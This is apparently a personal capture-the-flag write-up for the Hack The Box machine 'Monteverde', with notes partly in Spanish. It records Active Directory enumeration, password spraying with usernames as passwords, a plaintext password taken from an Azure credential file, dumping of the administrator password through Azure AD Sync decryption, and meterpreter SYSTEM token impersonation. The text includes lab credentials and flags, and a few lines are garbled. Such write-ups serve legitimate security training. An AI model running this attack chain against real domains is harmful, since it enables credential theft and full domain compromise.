HTB{monteverde}
f4d3 f4d3
recon
nmap
# Nmap 7.80 scan initiated Thu Mar 19 18:04:54 2020 as: nmap -sC -sV -p- -v -o monteverde_tcp.nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.19s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-19 21:24:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49774/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/19%Time=5E73E09F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 10m51s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-19T21:27:24
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:19:09 2020 -- 1 IP address (1 host up) scanned in 855.05 seconds
Búsqueda básica en el ldap
ldapsearch -h 10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL"
cat ldap.log | grep user
description: Default container for upgraded user accounts
objectClass: user
userAccountControl: 66082
description: Servers in this group enable users of RemoteApp programs and pers
e users RemoteApp programs and personal virtual desktops run. This group need
is applies only to WMI namespaces that grant access to the user.
objectClass: user
userAccountControl: 532480
description: All domain users
description: Servers in this group can access remote access properties of user
description: Members of this group can update user accounts in Active Director
objectClass: user
userAccountControl: 66048
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\mhope
userPrincipalName: mhope@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-ata@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-bexec@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-netapp@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\dgalanos
userPrincipalName: dgalanos@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\roleary
userPrincipalName: roleary@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\smorgan
userPrincipalName: smorgan@MEGABANK.LOCAL
cat ldap.log | grep user| grep home | awk -F 'users' '{print $2}' | tr -d '$\\' > users.txt
dgalanos
mhope
roleary
SABatchJobs
SatchJobs
smorgan
svc-ata
svc-bexec
svc-netapp
user.txt
Utilizando estos mismos usuarios como contraseñas, obtenemos uno válido:
root@Kali:~/Documentos/hackthebox/machines/monteverde for k in `cat users.txt`; do smbmap -u $k -d MEGABANK.LOCAL -p $k -H 10.10.10.172; done
SABatchJobs:SABatchJobs
root@Kali:~/Documentos/hackthebox/machines/monteverde smbclient -W MEGABANK.LOCAL '\\10.10.10.172\users$' -U 'SABatchJobs'%'SABatchJobs'
Try "help" to get a list of possible
smb: \> cd mhope
lsmb: \mhope\> ls
. D 0 Fri Jan 3 10:41:18 2020
.. D 0 Fri Jan 3 10:41:18 2020
azure.xml AR 1212 Fri Jan 3 10:40:23 2020
524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1,3 KiloBytes/sec) (average 1,3 KiloBytes/sec) D 0 Fri Jan 3 10:10:30 2020
creds
root@Kali:~/Documentos/hackthebox/machines/montevroot
erde/user.txt# cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>root@Kali:~/Documentos/hackthebox/machines/monteverde/user.txt#
Usamos el mismo script para ver de quién son las creds:
son de mhope.
winrm con mhope:4n0therD4y@n0th3r$
user.txt:4961976bd7d8f4eeb2ce3705e2f212f2
root.txt
PS C:\Users\mhope\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
Con esto, tendremos privilegios necesarios para dumpear las creds del administrador abusando el XML encrypt en las sentencias SQL el azure ad sync link
PS C:\program files\microsoft azure ad sync\bin> C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL
C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
PS C:\program files\microsoft azure ad sync\bin>
got it
ot@Kali:~/Documentos/hackthebox/machines/monteverde/root.txt# ruby winrm_admin.rb
PS C:\Users\Administrator\Documents> whoami
megabank\administrator
PS C:\Users\Administrator\Documents> type C:\users\administrator\desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
PS C:\Users\Administrator\Documents>
Para System
erpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
MEGABANK\AAD_987d7f2f57d2
MEGABANK\Administrator
MEGABANK\mhope
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY
Window Manager\DWM-1
Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK SERVICE
NT SERVICE\MSSQLSERVER
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >